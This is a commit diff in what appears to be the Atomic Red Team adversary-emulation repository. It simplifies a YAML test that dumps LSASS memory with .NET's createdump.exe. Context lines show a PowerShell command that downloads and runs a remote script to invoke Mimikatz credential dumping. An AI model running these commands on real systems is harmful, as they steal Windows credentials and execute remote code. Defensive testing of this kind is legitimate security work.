security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add prereqs and simplify (#2269)

Browse Source
This commit is contained in:
Carrie Roberts
2023-01-11 16:52:34 -07:00
committed by GitHub
parent 8a750920de
commit 44ce87e92e
1 changed files with 12 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.001/T1003.001.yaml
+12 -22
View File
@@ -287,41 +287,31 @@ atomic_tests:
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
- name: Dump LSASS with createdump.exe from .Net v5
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\dotnet-lsass.dmp
createdump_exe:
description: Path of createdump.exe executable
type: Path
default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have createdump.exe from .Net 5
.Net v5 must be installed
prereq_command: |
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if (Test-Path $exePath) {exit 0} else {exit 1}
get_prereq_command: |
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
executor:
command: |
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |